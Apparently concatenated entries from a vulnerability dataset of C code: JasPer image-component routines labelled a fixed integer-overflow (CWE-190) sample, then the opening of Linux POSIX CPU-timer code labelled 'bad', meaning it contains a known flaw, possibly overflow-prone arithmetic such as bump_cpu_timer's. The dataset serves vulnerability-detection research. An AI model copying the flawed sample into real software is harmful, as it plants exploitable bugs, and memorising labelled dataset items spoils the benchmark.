int jas_image_strtofmt(char *name)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyname(name))) {
return -1;
}
return fmtinfo->id;
}
char *jas_image_fmttostr(int fmt)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt))) {
return 0;
}
return fmtinfo->name;
}
int jas_image_getfmt(jas_stream_t *in)
{
jas_image_fmtinfo_t *fmtinfo;
int found;
int i;
/* Check for data in each of the supported formats. */
found = 0;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i,
++fmtinfo) {
if (fmtinfo->ops.validate) {
/* Is the input data valid for this format? */
JAS_DBGLOG(20, ("testing for format %s ... ", fmtinfo->name));
if (!(*fmtinfo->ops.validate)(in)) {
JAS_DBGLOG(20, ("test succeeded\n"));
found = 1;
break;
}
JAS_DBGLOG(20, ("test failed\n"));
}
}
return found ? fmtinfo->id : (-1);
}
int jas_image_fmtfromname(char *name)
{
int i;
char *ext;
jas_image_fmtinfo_t *fmtinfo;
/* Get the file name extension. */
if (!(ext = strrchr(name, '.'))) {
return -1;
}
++ext;
/* Try to find a format that uses this extension. */
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i,
++fmtinfo) {
/* Do we have a match? */
if (!strcmp(ext, fmtinfo->ext)) {
return fmtinfo->id;
}
}
return -1;
}
/******************************************************************************\
* Miscellaneous operations.
\******************************************************************************/
bool jas_image_cmpt_domains_same(jas_image_t *image)
{
int cmptno;
jas_image_cmpt_t *cmpt;
jas_image_cmpt_t *cmpt0;
cmpt0 = image->cmpts_[0];
for (cmptno = 1; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
if (cmpt->tlx_ != cmpt0->tlx_ || cmpt->tly_ != cmpt0->tly_ ||
cmpt->hstep_ != cmpt0->hstep_ || cmpt->vstep_ != cmpt0->vstep_ ||
cmpt->width_ != cmpt0->width_ || cmpt->height_ != cmpt0->height_) {
return 0;
}
}
return 1;
}
uint_fast32_t jas_image_rawsize(jas_image_t *image)
{
uint_fast32_t rawsize;
int cmptno;
jas_image_cmpt_t *cmpt;
rawsize = 0;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
rawsize += (cmpt->width_ * cmpt->height_ * cmpt->prec_ +
7) / 8;
}
return rawsize;
}
void jas_image_delcmpt(jas_image_t *image, int cmptno)
{
if (cmptno >= image->numcmpts_) {
return;
}
jas_image_cmpt_destroy(image->cmpts_[cmptno]);
if (cmptno < image->numcmpts_) {
memmove(&image->cmpts_[cmptno], &image->cmpts_[cmptno + 1],
(image->numcmpts_ - 1 - cmptno) * sizeof(jas_image_cmpt_t *));
}
--image->numcmpts_;
jas_image_setbbox(image);
}
int jas_image_addcmpt(jas_image_t *image, int cmptno,
jas_image_cmptparm_t *cmptparm)
{
jas_image_cmpt_t *newcmpt;
if (cmptno < 0) {
cmptno = image->numcmpts_;
}
assert(cmptno >= 0 && cmptno <= image->numcmpts_);
if (image->numcmpts_ >= image->maxcmpts_) {
if (jas_image_growcmpts(image, image->maxcmpts_ + 128)) {
return -1;
}
}
if (!(newcmpt = jas_image_cmpt_create(cmptparm->tlx,
cmptparm->tly, cmptparm->hstep, cmptparm->vstep,
cmptparm->width, cmptparm->height, cmptparm->prec,
cmptparm->sgnd, 1))) {
return -1;
}
if (cmptno < image->numcmpts_) {
memmove(&image->cmpts_[cmptno + 1], &image->cmpts_[cmptno],
(image->numcmpts_ - cmptno) * sizeof(jas_image_cmpt_t *));
}
image->cmpts_[cmptno] = newcmpt;
++image->numcmpts_;
jas_image_setbbox(image);
return 0;
}
jas_image_fmtinfo_t *jas_image_lookupfmtbyid(int id)
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i, ++fmtinfo) {
if (fmtinfo->id == id) {
return fmtinfo;
}
}
return 0;
}
jas_image_fmtinfo_t *jas_image_lookupfmtbyname(const char *name)
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i, ++fmtinfo) {
if (!strcmp(fmtinfo->name, name)) {
return fmtinfo;
}
}
return 0;
}
static uint_fast32_t inttobits(jas_seqent_t v, int prec, bool sgnd)
{
uint_fast32_t ret;
ret = ((sgnd && v < 0) ? ((1 << prec) + v) : v) & JAS_ONES(prec);
return ret;
}
static jas_seqent_t bitstoint(uint_fast32_t v, int prec, bool sgnd)
{
jas_seqent_t ret;
v &= JAS_ONES(prec);
ret = (sgnd && (v & (1 << (prec - 1)))) ? (v - (1 << prec)) : v;
return ret;
}
static void jas_image_setbbox(jas_image_t *image)
{
jas_image_cmpt_t *cmpt;
int cmptno;
int_fast32_t x;
int_fast32_t y;
if (image->numcmpts_ > 0) {
/* Determine the bounding box for all of the components on the
reference grid (i.e., the image area) */
cmpt = image->cmpts_[0];
image->tlx_ = cmpt->tlx_;
image->tly_ = cmpt->tly_;
image->brx_ = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1) + 1;
image->bry_ = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1) + 1;
for (cmptno = 1; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
if (image->tlx_ > cmpt->tlx_) {
image->tlx_ = cmpt->tlx_;
}
if (image->tly_ > cmpt->tly_) {
image->tly_ = cmpt->tly_;
}
x = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1) + 1;
if (image->brx_ < x) {
image->brx_ = x;
}
y = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1) + 1;
if (image->bry_ < y) {
image->bry_ = y;
}
}
} else {
image->tlx_ = 0;
image->tly_ = 0;
image->brx_ = 0;
image->bry_ = 0;
}
}
static int jas_image_growcmpts(jas_image_t *image, int maxcmpts)
{
jas_image_cmpt_t **newcmpts;
int cmptno;
newcmpts = (!image->cmpts_) ? jas_alloc2(maxcmpts,
sizeof(jas_image_cmpt_t *)) :
jas_realloc2(image->cmpts_, maxcmpts, sizeof(jas_image_cmpt_t *));
if (!newcmpts) {
return -1;
}
image->cmpts_ = newcmpts;
image->maxcmpts_ = maxcmpts;
for (cmptno = image->numcmpts_; cmptno < image->maxcmpts_; ++cmptno) {
image->cmpts_[cmptno] = 0;
}
return 0;
}
int jas_image_copycmpt(jas_image_t *dstimage, int dstcmptno,
jas_image_t *srcimage, int srccmptno)
{
jas_image_cmpt_t *newcmpt;
if (dstimage->numcmpts_ >= dstimage->maxcmpts_) {
if (jas_image_growcmpts(dstimage, dstimage->maxcmpts_ + 128)) {
return -1;
}
}
if (!(newcmpt = jas_image_cmpt_copy(srcimage->cmpts_[srccmptno]))) {
return -1;
}
if (dstcmptno < dstimage->numcmpts_) {
memmove(&dstimage->cmpts_[dstcmptno + 1], &dstimage->cmpts_[dstcmptno],
(dstimage->numcmpts_ - dstcmptno) * sizeof(jas_image_cmpt_t *));
}
dstimage->cmpts_[dstcmptno] = newcmpt;
++dstimage->numcmpts_;
jas_image_setbbox(dstimage);
return 0;
}
void jas_image_dump(jas_image_t *image, FILE *out)
{
long buf[1024];
int cmptno;
int n;
int i;
int width;
int height;
jas_image_cmpt_t *cmpt;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
fprintf(out, "prec=%d, sgnd=%d, cmpttype=%"PRIiFAST32"\n", cmpt->prec_,
cmpt->sgnd_, cmpt->type_);
width = jas_image_cmptwidth(image, cmptno);
height = jas_image_cmptheight(image, cmptno);
n = JAS_MIN(16, width);
if (jas_image_readcmpt2(image, cmptno, 0, 0, n, 1, buf)) {
abort();
}
for (i = 0; i < n; ++i) {
fprintf(out, " f(%d,%d)=%ld", i, 0, buf[i]);
}
fprintf(out, "\n");
if (jas_image_readcmpt2(image, cmptno, width - n, height - 1, n, 1, buf)) {
abort();
}
for (i = 0; i < n; ++i) {
fprintf(out, " f(%d,%d)=%ld", width - n + i, height - 1, buf[i]);
}
fprintf(out, "\n");
}
}
int jas_image_depalettize(jas_image_t *image, int cmptno, int numlutents,
int_fast32_t *lutents, int dtype, int newcmptno)
{
jas_image_cmptparm_t cmptparms;
int_fast32_t v;
int i;
int j;
jas_image_cmpt_t *cmpt;
cmpt = image->cmpts_[cmptno];
cmptparms.tlx = cmpt->tlx_;
cmptparms.tly = cmpt->tly_;
cmptparms.hstep = cmpt->hstep_;
cmptparms.vstep = cmpt->vstep_;
cmptparms.width = cmpt->width_;
cmptparms.height = cmpt->height_;
cmptparms.prec = JAS_IMAGE_CDT_GETPREC(dtype);
cmptparms.sgnd = JAS_IMAGE_CDT_GETSGND(dtype);
if (jas_image_addcmpt(image, newcmptno, &cmptparms)) {
return -1;
}
if (newcmptno <= cmptno) {
++cmptno;
cmpt = image->cmpts_[cmptno];
}
for (j = 0; j < cmpt->height_; ++j) {
for (i = 0; i < cmpt->width_; ++i) {
v = jas_image_readcmptsample(image, cmptno, i, j);
if (v < 0) {
v = 0;
} else if (v >= numlutents) {
v = numlutents - 1;
}
jas_image_writecmptsample(image, newcmptno, i, j,
lutents[v]);
}
}
return 0;
}
int jas_image_readcmptsample(jas_image_t *image, int cmptno, int x, int y)
{
jas_image_cmpt_t *cmpt;
uint_fast32_t v;
int k;
int c;
cmpt = image->cmpts_[cmptno];
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * y + x) * cmpt->cps_,
SEEK_SET) < 0) {
return -1;
}
v = 0;
for (k = cmpt->cps_; k > 0; --k) {
if ((c = jas_stream_getc(cmpt->stream_)) == EOF) {
return -1;
}
v = (v << 8) | (c & 0xff);
}
return bitstoint(v, cmpt->prec_, cmpt->sgnd_);
}
void jas_image_writecmptsample(jas_image_t *image, int cmptno, int x, int y,
int_fast32_t v)
{
jas_image_cmpt_t *cmpt;
uint_fast32_t t;
int k;
int c;
cmpt = image->cmpts_[cmptno];
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * y + x) * cmpt->cps_,
SEEK_SET) < 0) {
return;
}
t = inttobits(v, cmpt->prec_, cmpt->sgnd_);
for (k = cmpt->cps_; k > 0; --k) {
c = (t >> (8 * (cmpt->cps_ - 1))) & 0xff;
if (jas_stream_putc(cmpt->stream_, (unsigned char) c) == EOF) {
return;
}
t <<= 8;
}
}
int jas_image_getcmptbytype(jas_image_t *image, int ctype)
{
int cmptno;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
if (image->cmpts_[cmptno]->type_ == ctype) {
return cmptno;
}
}
return -1;
}
/***********************************************/
/***********************************************/
/***********************************************/
/***********************************************/
int jas_image_readcmpt2(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
long *buf)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
long v;
long *bufptr;
if (cmptno < 0 || cmptno >= image->numcmpts_)
goto error;
cmpt = image->cmpts_[cmptno];
if (x < 0 || x >= cmpt->width_ || y < 0 || y >= cmpt->height_ ||
width < 0 || height < 0 || x + width > cmpt->width_ ||
y + height > cmpt->height_)
goto error;
bufptr = buf;
for (i = 0; i < height; ++i) {
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0)
goto error;
for (j = 0; j < width; ++j) {
if (getint(cmpt->stream_, cmpt->sgnd_, cmpt->prec_, &v))
goto error;
*bufptr++ = v;
}
}
return 0;
error:
return -1;
}
int jas_image_writecmpt2(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
long *buf)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
long v;
long *bufptr;
if (cmptno < 0 || cmptno >= image->numcmpts_)
goto error;
cmpt = image->cmpts_[cmptno];
if (x < 0 || x >= cmpt->width_ || y < 0 || y >= cmpt->height_ ||
width < 0 || height < 0 || x + width > cmpt->width_ ||
y + height > cmpt->height_)
goto error;
bufptr = buf;
for (i = 0; i < height; ++i) {
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0)
goto error;
for (j = 0; j < width; ++j) {
v = *bufptr++;
if (putint(cmpt->stream_, cmpt->sgnd_, cmpt->prec_, v))
goto error;
}
}
return 0;
error:
return -1;
}
int jas_image_sampcmpt(jas_image_t *image, int cmptno, int newcmptno,
jas_image_coord_t ho, jas_image_coord_t vo, jas_image_coord_t hs,
jas_image_coord_t vs, int sgnd, int prec)
{
jas_image_cmpt_t *oldcmpt;
jas_image_cmpt_t *newcmpt;
int width;
int height;
jas_image_coord_t tlx;
jas_image_coord_t tly;
jas_image_coord_t brx;
jas_image_coord_t bry;
int i;
int j;
jas_image_cmptparm_t cmptparm;
jas_image_coord_t ax;
jas_image_coord_t ay;
jas_image_coord_t bx;
jas_image_coord_t by;
jas_image_coord_t d0;
jas_image_coord_t d1;
jas_image_coord_t d2;
jas_image_coord_t d3;
jas_image_coord_t oldx;
jas_image_coord_t oldy;
jas_image_coord_t x;
jas_image_coord_t y;
long v;
jas_image_coord_t cmptbrx;
jas_image_coord_t cmptbry;
assert(cmptno >= 0 && cmptno < image->numcmpts_);
oldcmpt = image->cmpts_[cmptno];
assert(oldcmpt->tlx_ == 0 && oldcmpt->tly_ == 0);
jas_image_calcbbox2(image, &tlx, &tly, &brx, &bry);
width = FLOORDIV(brx - ho + hs, hs);
height = FLOORDIV(bry - vo + vs, vs);
cmptparm.tlx = ho;
cmptparm.tly = vo;
cmptparm.hstep = hs;
cmptparm.vstep = vs;
cmptparm.width = width;
cmptparm.height = height;
cmptparm.prec = prec;
cmptparm.sgnd = sgnd;
if (jas_image_addcmpt(image, newcmptno, &cmptparm))
goto error;
cmptbrx = oldcmpt->tlx_ + (oldcmpt->width_ - 1) * oldcmpt->hstep_;
cmptbry = oldcmpt->tly_ + (oldcmpt->height_ - 1) * oldcmpt->vstep_;
newcmpt = image->cmpts_[newcmptno];
jas_stream_rewind(newcmpt->stream_);
for (i = 0; i < height; ++i) {
y = newcmpt->tly_ + newcmpt->vstep_ * i;
for (j = 0; j < width; ++j) {
x = newcmpt->tlx_ + newcmpt->hstep_ * j;
ax = downtomult(x - oldcmpt->tlx_, oldcmpt->hstep_) + oldcmpt->tlx_;
ay = downtomult(y - oldcmpt->tly_, oldcmpt->vstep_) + oldcmpt->tly_;
bx = uptomult(x - oldcmpt->tlx_, oldcmpt->hstep_) + oldcmpt->tlx_;
if (bx > cmptbrx)
bx = cmptbrx;
by = uptomult(y - oldcmpt->tly_, oldcmpt->vstep_) + oldcmpt->tly_;
if (by > cmptbry)
by = cmptbry;
d0 = (ax - x) * (ax - x) + (ay - y) * (ay - y);
d1 = (bx - x) * (bx - x) + (ay - y) * (ay - y);
d2 = (bx - x) * (bx - x) + (by - y) * (by - y);
d3 = (ax - x) * (ax - x) + (by - y) * (by - y);
if (d0 <= d1 && d0 <= d2 && d0 <= d3) {
oldx = (ax - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (ay - oldcmpt->tly_) / oldcmpt->vstep_;
} else if (d1 <= d0 && d1 <= d2 && d1 <= d3) {
oldx = (bx - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (ay - oldcmpt->tly_) / oldcmpt->vstep_;
} else if (d2 <= d0 && d2 <= d1 && d1 <= d3) {
oldx = (bx - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (by - oldcmpt->tly_) / oldcmpt->vstep_;
} else {
oldx = (ax - oldcmpt->tlx_) / oldcmpt->hstep_;
oldy = (by - oldcmpt->tly_) / oldcmpt->vstep_;
}
assert(oldx >= 0 && oldx < oldcmpt->width_ &&
oldy >= 0 && oldy < oldcmpt->height_);
if (jas_stream_seek(oldcmpt->stream_, oldcmpt->cps_ *
(oldy * oldcmpt->width_ + oldx), SEEK_SET) < 0)
goto error;
if (getint(oldcmpt->stream_, oldcmpt->sgnd_,
oldcmpt->prec_, &v))
goto error;
if (newcmpt->prec_ != oldcmpt->prec_ ||
newcmpt->sgnd_ != oldcmpt->sgnd_) {
v = convert(v, oldcmpt->sgnd_, oldcmpt->prec_,
newcmpt->sgnd_, newcmpt->prec_);
}
if (putint(newcmpt->stream_, newcmpt->sgnd_,
newcmpt->prec_, v))
goto error;
}
}
return 0;
error:
return -1;
}
int jas_image_ishomosamp(jas_image_t *image)
{
jas_image_coord_t hstep;
jas_image_coord_t vstep;
int result;
int i;
hstep = jas_image_cmpthstep(image, 0);
vstep = jas_image_cmptvstep(image, 0);
result = 1;
for (i = 0; i < image->numcmpts_; ++i) {
if (jas_image_cmpthstep(image, i) != hstep ||
jas_image_cmptvstep(image, i) != vstep) {
result = 0;
break;
}
}
return result;
}
/* Note: This function defines a bounding box differently. */
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t tmptlx;
jas_image_coord_t tmptly;
jas_image_coord_t tmpbrx;
jas_image_coord_t tmpbry;
jas_image_coord_t t;
int i;
if (image->numcmpts_ > 0) {
cmpt = image->cmpts_[0];
tmptlx = cmpt->tlx_;
tmptly = cmpt->tly_;
tmpbrx = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1);
tmpbry = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1);
for (i = 0; i < image->numcmpts_; ++i) {
cmpt = image->cmpts_[i];
if (cmpt->tlx_ < tmptlx)
tmptlx = cmpt->tlx_;
if (cmpt->tly_ < tmptly)
tmptly = cmpt->tly_;
t = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1);
if (t > tmpbrx)
tmpbrx = t;
t = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1);
if (t > tmpbry)
tmpbry = t;
}
} else {
tmptlx = 0;
tmptly = 0;
tmpbrx = -1;
tmpbry = -1;
}
*tlx = tmptlx;
*tly = tmptly;
*brx = tmpbrx;
*bry = tmpbry;
}
static inline long decode_twos_comp(ulong c, int prec)
{
long result;
assert(prec >= 2);
jas_eprintf("warning: support for signed data is untested\n");
// NOTE: Is this correct?
result = (c & ((1 << (prec - 1)) - 1)) - (c & (1 << (prec - 1)));
return result;
}
static inline ulong encode_twos_comp(long n, int prec)
{
ulong result;
assert(prec >= 2);
jas_eprintf("warning: support for signed data is untested\n");
// NOTE: Is this correct?
if (n < 0) {
result = -n;
result = (result ^ 0xffffffffUL) + 1;
result &= (1 << prec) - 1;
} else {
result = n;
}
return result;
}
static int getint(jas_stream_t *in, int sgnd, int prec, long *val)
{
long v;
int n;
int c;
assert((!sgnd && prec >= 1) || (sgnd && prec >= 2));
n = (prec + 7) / 8;
v = 0;
while (--n >= 0) {
if ((c = jas_stream_getc(in)) == EOF)
return -1;
v = (v << 8) | c;
}
v &= ((1 << prec) - 1);
if (sgnd) {
*val = decode_twos_comp(v, prec);
} else {
*val = v;
}
return 0;
}
static int putint(jas_stream_t *out, int sgnd, int prec, long val)
{
int n;
int c;
bool s;
ulong tmp;
assert((!sgnd && prec >= 1) || (sgnd && prec >= 2));
if (sgnd) {
val = encode_twos_comp(val, prec);
}
assert(val >= 0);
val &= (1 << prec) - 1;
n = (prec + 7) / 8;
while (--n >= 0) {
c = (val >> (n * 8)) & 0xff;
if (jas_stream_putc(out, c) != c)
return -1;
}
return 0;
}
static long convert(long val, int oldsgnd, int oldprec, int newsgnd,
int newprec)
{
if (newsgnd != oldsgnd) {
}
if (newprec != oldprec) {
if (newprec > oldprec) {
val <<= newprec - oldprec;
} else if (oldprec > newprec) {
val >>= oldprec - newprec;
}
}
return val;
}
static long downtomult(long x, long y)
{
assert(x >= 0);
return (x / y) * y;
}
static long uptomult(long x, long y)
{
assert(x >= 0);
return ((x + y - 1) / y) * y;
}
jas_image_t *jas_image_chclrspc(jas_image_t *image, jas_cmprof_t *outprof,
int intent)
{
jas_image_t *inimage;
int minhstep;
int minvstep;
int i;
int j;
int k;
int n;
int hstep;
int vstep;
int numinauxchans;
int numoutauxchans;
int numinclrchans;
int numoutclrchans;
int prec;
jas_image_t *outimage;
int cmpttype;
int numoutchans;
jas_cmprof_t *inprof;
jas_cmprof_t *tmpprof;
jas_image_cmptparm_t cmptparm;
int width;
int height;
jas_cmxform_t *xform;
jas_cmpixmap_t inpixmap;
jas_cmpixmap_t outpixmap;
jas_cmcmptfmt_t *incmptfmts;
jas_cmcmptfmt_t *outcmptfmts;
#if 0
jas_eprintf("IMAGE\n");
jas_image_dump(image, stderr);
#endif
outimage = 0;
xform = 0;
if (!(inimage = jas_image_copy(image)))
goto error;
image = 0;
if (!jas_image_ishomosamp(inimage)) {
minhstep = jas_image_cmpthstep(inimage, 0);
minvstep = jas_image_cmptvstep(inimage, 0);
for (i = 1; i < jas_image_numcmpts(inimage); ++i) {
hstep = jas_image_cmpthstep(inimage, i);
vstep = jas_image_cmptvstep(inimage, i);
if (hstep < minhstep) {
minhstep = hstep;
}
if (vstep < minvstep) {
minvstep = vstep;
}
}
n = jas_image_numcmpts(inimage);
for (i = 0; i < n; ++i) {
cmpttype = jas_image_cmpttype(inimage, i);
if (jas_image_sampcmpt(inimage, i, i + 1, 0, 0, minhstep, minvstep,
jas_image_cmptsgnd(inimage, i), jas_image_cmptprec(inimage, i))) {
goto error;
}
jas_image_setcmpttype(inimage, i + 1, cmpttype);
jas_image_delcmpt(inimage, i);
}
}
width = jas_image_cmptwidth(inimage, 0);
height = jas_image_cmptheight(inimage, 0);
hstep = jas_image_cmpthstep(inimage, 0);
vstep = jas_image_cmptvstep(inimage, 0);
if (!(inprof = jas_image_cmprof(inimage))) {
abort();
}
numinclrchans = jas_clrspc_numchans(jas_cmprof_clrspc(inprof));
numinauxchans = jas_image_numcmpts(inimage) - numinclrchans;
numoutclrchans = jas_clrspc_numchans(jas_cmprof_clrspc(outprof));
numoutauxchans = 0;
numoutchans = numoutclrchans + numoutauxchans;
prec = 8;
if (!(outimage = jas_image_create0())) {
goto error;
}
/* Create a component for each of the colorants. */
for (i = 0; i < numoutclrchans; ++i) {
cmptparm.tlx = 0;
cmptparm.tly = 0;
cmptparm.hstep = hstep;
cmptparm.vstep = vstep;
cmptparm.width = width;
cmptparm.height = height;
cmptparm.prec = prec;
cmptparm.sgnd = 0;
if (jas_image_addcmpt(outimage, -1, &cmptparm))
goto error;
jas_image_setcmpttype(outimage, i, JAS_IMAGE_CT_COLOR(i));
}
#if 0
/* Copy the auxiliary components without modification. */
for (i = 0; i < jas_image_numcmpts(inimage); ++i) {
if (!ISCOLOR(jas_image_cmpttype(inimage, i))) {
jas_image_copycmpt(outimage, -1, inimage, i);
/* XXX - need to specify laydown of component on ref. grid */
}
}
#endif
if (!(tmpprof = jas_cmprof_copy(outprof)))
goto error;
assert(!jas_image_cmprof(outimage));
jas_image_setcmprof(outimage, tmpprof);
tmpprof = 0;
jas_image_setclrspc(outimage, jas_cmprof_clrspc(outprof));
if (!(xform = jas_cmxform_create(inprof, outprof, 0, JAS_CMXFORM_OP_FWD,
intent, 0))) {
goto error;
}
inpixmap.numcmpts = numinclrchans;
if (!(incmptfmts = jas_alloc2(numinclrchans, sizeof(jas_cmcmptfmt_t)))) {
abort();
}
inpixmap.cmptfmts = incmptfmts;
for (i = 0; i < numinclrchans; ++i) {
j = jas_image_getcmptbytype(inimage, JAS_IMAGE_CT_COLOR(i));
assert(j >= 0);
if (!(incmptfmts[i].buf = jas_alloc2(width, sizeof(long)))) {
goto error;
}
incmptfmts[i].prec = jas_image_cmptprec(inimage, j);
incmptfmts[i].sgnd = jas_image_cmptsgnd(inimage, j);
incmptfmts[i].width = width;
incmptfmts[i].height = 1;
}
outpixmap.numcmpts = numoutclrchans;
if (!(outcmptfmts = jas_alloc2(numoutclrchans, sizeof(jas_cmcmptfmt_t)))) {
abort();
}
outpixmap.cmptfmts = outcmptfmts;
for (i = 0; i < numoutclrchans; ++i) {
j = jas_image_getcmptbytype(outimage, JAS_IMAGE_CT_COLOR(i));
assert(j >= 0);
if (!(outcmptfmts[i].buf = jas_alloc2(width, sizeof(long))))
goto error;
outcmptfmts[i].prec = jas_image_cmptprec(outimage, j);
outcmptfmts[i].sgnd = jas_image_cmptsgnd(outimage, j);
outcmptfmts[i].width = width;
outcmptfmts[i].height = 1;
}
for (i = 0; i < height; ++i) {
for (j = 0; j < numinclrchans; ++j) {
k = jas_image_getcmptbytype(inimage, JAS_IMAGE_CT_COLOR(j));
if (jas_image_readcmpt2(inimage, k, 0, i, width, 1,
incmptfmts[j].buf))
goto error;
}
jas_cmxform_apply(xform, &inpixmap, &outpixmap);
for (j = 0; j < numoutclrchans; ++j) {
k = jas_image_getcmptbytype(outimage, JAS_IMAGE_CT_COLOR(j));
if (jas_image_writecmpt2(outimage, k, 0, i, width, 1,
outcmptfmts[j].buf))
goto error;
}
}
for (i = 0; i < numoutclrchans; ++i) {
jas_free(outcmptfmts[i].buf);
}
jas_free(outcmptfmts);
for (i = 0; i < numinclrchans; ++i) {
jas_free(incmptfmts[i].buf);
}
jas_free(incmptfmts);
jas_cmxform_destroy(xform);
jas_image_destroy(inimage);
#if 0
jas_eprintf("INIMAGE\n");
jas_image_dump(inimage, stderr);
jas_eprintf("OUTIMAGE\n");
jas_image_dump(outimage, stderr);
#endif
return outimage;
error:
if (xform)
jas_cmxform_destroy(xform);
if (inimage)
jas_image_destroy(inimage);
if (outimage)
jas_image_destroy(outimage);
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5400_1 |
crossvul-cpp_data_bad_207_1 | // SPDX-License-Identifier: GPL-2.0
/*
* Implement CPU time clocks for the POSIX clock interface.
*/
#include <linux/sched/signal.h>
#include <linux/sched/cputime.h>
#include <linux/posix-timers.h>
#include <linux/errno.h>
#include <linux/math64.h>
#include <linux/uaccess.h>
#include <linux/kernel_stat.h>
#include <trace/events/timer.h>
#include <linux/tick.h>
#include <linux/workqueue.h>
#include <linux/compat.h>
#include <linux/sched/deadline.h>
#include "posix-timers.h"
static void posix_cpu_timer_rearm(struct k_itimer *timer);
/*
* Called after updating RLIMIT_CPU to run cpu timer and update
* tsk->signal->cputime_expires expiration cache if necessary. Needs
* siglock protection since other code may update expiration cache as
* well.
*/
void update_rlimit_cpu(struct task_struct *task, unsigned long rlim_new)
{
u64 nsecs = rlim_new * NSEC_PER_SEC;
spin_lock_irq(&task->sighand->siglock);
set_process_cpu_timer(task, CPUCLOCK_PROF, &nsecs, NULL);
spin_unlock_irq(&task->sighand->siglock);
}
static int check_clock(const clockid_t which_clock)
{
int error = 0;
struct task_struct *p;
const pid_t pid = CPUCLOCK_PID(which_clock);
if (CPUCLOCK_WHICH(which_clock) >= CPUCLOCK_MAX)
return -EINVAL;
if (pid == 0)
return 0;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (!p || !(CPUCLOCK_PERTHREAD(which_clock) ?
same_thread_group(p, current) : has_group_leader_pid(p))) {
error = -EINVAL;
}
rcu_read_unlock();
return error;
}
/*
* Update expiry time from increment, and increase overrun count,
* given the current clock sample.
*/
static void bump_cpu_timer(struct k_itimer *timer, u64 now)
{
int i;
u64 delta, incr;
if (timer->it.cpu.incr == 0)
return;
if (now < timer->it.cpu.expires)
return;
incr = timer->it.cpu.incr;
delta = now + incr - timer->it.cpu.expires;
/* Don't use (incr*2 < delta), incr*2 might overflow. */
for (i = 0; incr < delta - incr; i++)
incr = incr << 1;
for (; i >= 0; incr >>= 1, i--) {
if (delta < incr)
continue;
timer->it.cpu.expires += incr;
timer->it_overrun += 1 << i;
delta -= incr;
}
}
/**
* task_cputime_zero - Check a task_cputime struct for all zero fields.
*
* @cputime: The struct to compare.
*
* Checks @cputime to see if all fields are zero. Returns true if all fields
* are zero, false if any field is nonzero.
*/
static inline int task_cputime_zero(const struct task_cputime *cputime)
{
if (!cputime->utime && !cputime->stime && !cputime->sum_exec_runtime)
return 1;
return 0;
}
static inline u64 prof_ticks(struct task_struct *p)
{
u64 utime, stime;
task_cputime(p, &utime, &stime);
return utime + stime;
}
static inline u64 virt_ticks(struct task_struct *p)
{
u64 utime, stime;
task_cputime(p, &utime, &stime);
return utime;
}
static int
posix_cpu_clock_getres(const clockid_t which_clock, struct timespec64 *tp)
{
int error = check_clock(which_clock);
if (!error) {
tp->tv_sec = 0;
tp->tv_nsec = ((NSEC_PER_SEC + HZ - 1) / HZ);
if (CPUCLOCK_WHICH(which_clock) == CPUCLOCK_SCHED) {
/*
* If sched_clock is using a cycle counter, we
* don't have any idea of its true resolution
* exported, but it is much more than 1s/HZ.
*/
tp->tv_nsec = 1;
}
}
return error;
}
static int
posix_cpu_clock_set(const clockid_t which_clock, const struct timespec64 *tp)
{
/*
* You can never reset a CPU clock, but we check for other errors
* in the call before failing with EPERM.
*/
int error = check_clock(which_clock);
if (error == 0) {
error = -EPERM;
}
return error;
}
/*
* Sample a per-thread clock for the given task.
*/
static int cpu_clock_sample(const clockid_t which_clock,
struct task_struct *p, u64 *sample)
{
switch (CPUCLOCK_WHICH(which_clock)) {
default:
return -EINVAL;
case CPUCLOCK_PROF:
*sample = prof_ticks(p);
break;
case CPUCLOCK_VIRT:
*sample = virt_ticks(p);
break;
case CPUCLOCK_SCHED:
*sample = task_sched_runtime(p);
break;
}
return 0;
}
/*
* Set cputime to sum_cputime if sum_cputime > cputime. Use cmpxchg
* to avoid race conditions with concurrent updates to cputime.
*/
